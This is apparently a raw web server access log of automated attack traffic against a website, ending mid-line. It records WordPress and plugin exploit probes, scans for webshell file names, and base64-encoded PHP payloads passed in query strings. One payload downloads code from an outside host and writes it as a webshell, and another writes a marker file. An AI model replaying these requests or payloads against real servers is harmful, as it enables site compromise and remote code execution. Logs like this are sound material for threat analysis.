"-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:59:28 -0400] "GET /xx.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:16:59:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:16:59:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:16:59:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:16:59:43 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:17:02:20 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:17:02:20 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:17:02:20 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:17:02:21 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:17:03:28 -0400] "POST //wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1" 301 284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:17:04:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:17:04:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:17:04:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:17:04:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:04:50 -0400] "GET /admin.php?action=beindex&password=sem2023&aver=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&fileplus=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&checkstring=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg== HTTP/1.1" 301 885 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:04:50 -0400] "GET /atomlib.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:04:51 -0400] "GET /aver.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:04:52 -0400] "GET /ovatools.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:05:02 -0400] "GET //Taf.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:05:09 -0400] "GET /admin.php?action=beindex&password=sem2023&aver=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&fileplus=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&checkstring=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg== HTTP/1.1" 301 885 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:05:11 -0400] "GET /aver.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:05:12 -0400] "GET /ovatools.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:06:33 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3NxeGppLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:06:36 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2J6Zm52LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:06:39 -0400] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:06:41 -0400] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:08:14 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:08:56 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NqYWh1LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:10:34 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:11:02 -0400] "GET /wp-content/themes/aahana/json.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:11:03 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:11:10 -0400] "GET /wp-content/themes/newstoday/lang.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:11:23 -0400] "GET /wp-22.php?sfilename=bdkr28tools.php&sfilecontent=&supfiles= HTTP/1.1" 301 302 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:11:37 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 149.50.215.205 - - [12/Aug/2025:17:11:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:17:11:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:17:11:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:17:11:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:12:18 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3hheHN0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:12:23 -0400] "GET /xx.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:12:39 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:12:55 -0400] "GET /wp-content/themes/intense/block-css.php?mode=upload HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:13:01 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:13:54 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:14:00 -0400] "GET /.well-known/index.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:14:09 -0400] "GET /wzy.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:14:17 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2hkenl6LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 68.183.245.101 - - [12/Aug/2025:17:15:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:17:15:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:17:15:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:17:15:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:15:20 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:15:22 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:15:31 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:15:35 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:15:37 -0400] "POST //wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1" 301 284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:15:39 -0400] "GET //RxR.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:15:52 -0400] "GET //admin HTTP/1.1" 301 240 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:17:15:54 -0400] "GET //wp-admin/install.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 94.16.113.252 - - [12/Aug/2025:17:16:25 -0400] "GET //administrator/index.php HTTP/1.1" 301 258 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:17:16:51 -0400] "GET //wp-login.php HTTP/1.1" 301 247 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:17:17:14 -0400] "GET //admin HTTP/1.1" 301 240 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:17:18:01 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:19:51 -0400] "GET /wp-content/themes/classic/inc/index.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:20:14 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:20:30 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:22:33 -0400] "GET /wp-includes/sitemaps/providers/mariju.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:22:45 -0400] "GET /xx.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 4.197.236.174 - - [12/Aug/2025:17:22:56 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:57 -0400] "GET /ceo.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:57 -0400] "GET /article.php HTTP/1.1" 301 242 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:58 -0400] "GET /fire.php HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:58 -0400] "GET /boom.php HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:58 -0400] "GET /2025.php HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:59 -0400] "GET /blue.php?p= HTTP/1.1" 301 242 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:59 -0400] "GET /light.php HTTP/1.1" 301 240 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:22:59 -0400] "GET /lock360.php HTTP/1.1" 301 242 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:00 -0400] "GET /vv.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:00 -0400] "GET /v.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:00 -0400] "GET /star.php HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:00 -0400] "GET /error.php HTTP/1.1" 301 240 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:01 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:01 -0400] "GET /a.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:01 -0400] "GET /ee.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:02 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:02 -0400] "GET /system_log.php HTTP/1.1" 301 245 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:02 -0400] "GET /ar.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:03 -0400] "GET /lv.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:03 -0400] "GET /0.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:03 -0400] "GET /gmo.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:03 -0400] "GET /xc.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:04 -0400] "GET /bless.php HTTP/1.1" 301 240 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:04 -0400] "GET /r.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:04 -0400] "GET /ff.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:05 -0400] "GET /as.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:05 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:05 -0400] "GET /2.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:06 -0400] "GET /v4.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:06 -0400] "GET /t.php?p= HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:06 -0400] "GET /02.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:07 -0400] "GET /w.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:07 -0400] "GET /jp.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:07 -0400] "GET /kk.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:07 -0400] "GET /w.php?p= HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:08 -0400] "GET /3.php?p= HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:08 -0400] "GET /11.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:08 -0400] "GET /20.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:09 -0400] "GET /f35.php HTTP/1.1" 301 238 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:09 -0400] "GET /4.php?p= HTTP/1.1" 301 239 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:09 -0400] "GET /makeasmtp.php?p= HTTP/1.1" 301 247 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:10 -0400] "GET /build.php HTTP/1.1" 301 240 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:10 -0400] "GET /aa.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:10 -0400] "GET /bb.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:10 -0400] "GET /cc.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:11 -0400] "GET /dd.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:11 -0400] "GET /gg.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:11 -0400] "GET /hh.php HTTP/1.1" 301 237 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:12 -0400] "GET /i.php HTTP/1.1" 301 236 "-" "-" 4.197.236.174 - - [12/Aug/2025:17:23:12 -0400] "GET 